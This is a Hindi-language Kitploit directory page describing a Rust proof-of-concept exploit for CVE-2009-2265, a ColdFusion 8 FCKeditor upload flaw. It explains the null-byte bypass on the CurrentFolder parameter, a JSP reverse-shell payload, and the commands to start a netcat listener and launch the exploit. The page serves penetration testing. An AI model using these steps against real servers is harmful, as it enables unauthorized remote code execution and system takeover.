Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2009-2265 — A Rust implementation of the POC for the CVE-2009-2265 exploit, targeting Adobe ColdFusion 8. | Kitploit
उपकरण/GitHubGitHub/nika0x38/cve-2009-2265
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

A Rust implementation of the POC for the CVE-2009-2265 exploit, targeting Adobe ColdFusion 8.

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2009-2265 - एडोब कोल्डफ्यूजन 8 फ़ाइल अपलोड RCE

RustSecurity

CVE-2009-2265 एक्सप्लॉइट के POC का एक रस्ट कार्यान्वयन, जो एडोब कोल्डफ्यूजन 8 को लक्षित करता है।


भेद्यता अवलोकन

यह भेद्यता एक अप्रमाणित हमलावर को एडोब कोल्डफ्यूजन 8 चलाने वाले सर्वर पर वेब-सुलभ निर्देशिका में मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।

तकनीकी विवरण

  • भेद्यता: नल बाइट इंजेक्शन के माध्यम से निर्देशिका ट्रैवर्सल
  • घटक: FCKeditor upload.cfm कनेक्टर
  • पैरामीटर: CurrentFolder
  • प्रभाव: रिमोट कोड निष्पादन (RCE)
  • प्रभावित सॉफ्टवेयर: एडोब कोल्डफ्यूजन 8.0.1 और पहले

विवरण

यह भेद्यता /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm पर स्थित FCKeditor घटक की फ़ाइल अपलोड कार्यक्षमता में मौजूद है। CurrentFolder HTTP GET पैरामीटर को ठीक से स्वच्छ नहीं किया गया है, जो नल बाइट (%00) इंजेक्शन हमले की अनुमति देता है।

एक अनुरोध बनाकर जहाँ CurrentFolder पैरामीटर को /<filename>.jsp%00 पर सेट किया जाता है, एक हमलावर सर्वर-साइड एक्सटेंशन जाँचों को बायपास कर सकता है। अंतर्निहित प्रणाली (अक्सर जावा) नल बाइट को स्ट्रिंग के अंत के रूप में व्याख्यायित करती है, फ़ाइल नाम को <filename>.jsp मानते हुए। यह हमलावर को एक दुर्भावनापूर्ण JSP फ़ाइल अपलोड करने की अनुमति देता है। सर्वर इस फ़ाइल को सार्वजनिक रूप से सुलभ निर्देशिका (/userfiles/file/) में सहेजता है, जहाँ से इसे केवल इसके URL तक पहुँच कर निष्पादित किया जा सकता है।

यह POC एक JSP रिवर्स शेल पेलोड उत्पन्न करके, नल बाइट भेद्यता का उपयोग करके इसे अपलोड करके, और लक्ष्य प्रणाली पर शेल प्राप्त करने के लिए इसे ट्रिगर करके प्रक्रिया को स्वचालित करता है।

उपयोग

एक्सप्लॉइट को संकलित और चलाने के लिए इन चरणों का पालन करें।

चरण 1: Netcat लिसनर सेट करें

एक्सप्लॉइट चलाने से पहले, आने वाले रिवर्स शेल को पकड़ने के लिए अपनी स्थानीय मशीन पर एक लिसनर शुरू करें।

root@kitploit:~

nc -lnvp <attacker-port>

चरण 2: एक्सप्लॉइट चलाएँ

संकलित बाइनरी को निष्पादित करें, रिवर्स शेल के लिए अपना स्थानीय होस्ट/पोर्ट और रिमोट लक्ष्य का होस्ट/पोर्ट प्रदान करें।

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

स्क्रिप्ट द्वारा पेलोड ट्रिगर करने के बाद, आपको अपने Netcat लिसनर पर एक कनेक्शन प्राप्त करना चाहिए।

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। जिम्मेदारी से और केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें